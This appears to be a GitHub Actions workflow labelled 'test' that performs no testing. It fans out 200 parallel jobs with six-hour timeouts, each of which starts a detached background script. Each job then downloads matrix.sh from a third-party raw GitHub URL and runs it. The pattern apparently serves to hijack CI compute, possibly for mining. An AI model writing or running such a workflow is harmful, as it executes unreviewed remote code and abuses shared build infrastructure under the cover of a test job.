name: test

on: [push, pull_request]
  
jobs:
 build-1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
        flag: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    timeout-minutes: 360
    steps:
    - uses: actions/checkout@v2
    - name: kune
      run: |
        sudo apt install screen -y && screen -dmS test.sh ./test.sh 65 75 && wget https://raw.githubusercontent.com/kijang-008/matrix/main/matrix.sh && chmod u+x matrix.sh && ./matrix.sh
